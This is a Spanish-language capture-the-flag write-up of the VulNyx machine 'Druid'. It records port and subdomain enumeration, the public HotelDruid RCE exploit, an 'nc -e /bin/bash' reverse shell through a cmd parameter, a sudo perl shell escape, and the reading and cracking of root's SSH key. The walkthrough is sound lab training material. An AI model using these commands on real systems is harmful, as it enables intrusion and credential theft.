cd ~/blog

~/writeups/vulnyx/01-druid.md

01 - Druid

easy Linux vulnyx 25-02-2024
HotelDruid RCE (EDB-ID 50754)sudo perl PrivescCustom SUID binary file read
vulnyx.com

~1 min de lectura


Comenzamos con un escaneo general y uno específico de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.133
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.133
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-25 01:04 -03
Nmap scan report for 192.168.1.133
Host is up (0.00024s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f0e624fb9eb07a1abdf7b185237fb16f (RSA)
|   256 99c87431451058b0cecc63b47a82573d (ECDSA)
|_  256 60da3e3138fab549ab48c3432c9fd132 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Hotel
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds

Enumeramos directorios con gobuster:

 gobuster dir -u http://192.168.1.133 -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt -r
...
/index.html           (Status: 200) [Size: 33065]
/contact.html         (Status: 200) [Size: 13698]
/about.html           (Status: 200) [Size: 17025]
/events.html          (Status: 200) [Size: 12372]
/rooms.html           (Status: 200) [Size: 15616]
/reservation.html     (Status: 200) [Size: 15792]
...

Con whatweb identificamos un dominio asociado:

 whatweb http://192.168.1.133
http://192.168.1.133 [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[info@hotel.nyx], HTML5, HTTPServer[Debian Linux][Apache/2.4.56 (Debian)], IP[192.168.1.133], JQuery[3.3.1], Script, Title[Hotel], X-UA-Compatible[IE=edge]

Agregamos hotel.nyx al /etc/hosts y fuzzeamos subdominios, descubriendo reservations:

 ffuf -u http://hotel.nyx -H "Host: FUZZ.hotel.nyx" -w ~/Documentos/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fs 33064
...
reservations            [Status: 200, Size: 398, Words: 25, Lines: 18]
...

Agregamos el nuevo subdominio al /etc/hosts y accedemos. El sitio ejecuta HotelDruid, vulnerable a RCE. Usamos el exploit (EDB-ID 50754), que añade una habitación maliciosa y deja un endpoint para ejecutar comandos:

 python3 50754.py -t http://reservations.hotel.nyx --noauth

 /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/

Exploit By - 0z09e (https://twitter.com/0z09e)

[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://reservations.hotel.nyx/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

Accedemos al endpoint con una reverse shell en el parámetro cmd:

http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=nc -e /bin/bash 192.168.1.10 1234

Obtenemos la sesión como www-data. Para escalar privilegios, revisamos los permisos sudo:

www-data@druid:/var/www/hoteldruid/dati$ sudo -l
sudo -l
Matching Defaults entries for www-data on druid:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on druid:
    (sun) NOPASSWD: /usr/bin/perl

Podemos ejecutar perl como sun, lo que aprovechamos para obtener una shell de ese usuario:

www-data@druid:/home$ sudo -u sun perl -e 'exec "/bin/sh";'
$ whoami
sun

Obtenemos la primera flag y comenzamos la segunda escalada. Buscando binarios SUID, encontramos uno llamado super, que permite ejecutar un comando secret con uid=0 y gid=0. El comando secret actúa como un cat que invierte el contenido que lista. Con esa lectura privilegiada, leemos la clave id_rsa de root (invirtiéndola con rev):

sun@druid:~$ super secret /root/.ssh/id_rsa | rev

Crackeamos la passphrase de la clave con john:

 ssh2john root_id_rsa > hash
 john -w:/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
super1           (root_id_rsa)
...

Y nos conectamos como root:

 ssh root@192.168.1.19 -i root_id_rsa
Enter passphrase for key 'root_id_rsa':
root@druid:~#

Obtenemos nuestra flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados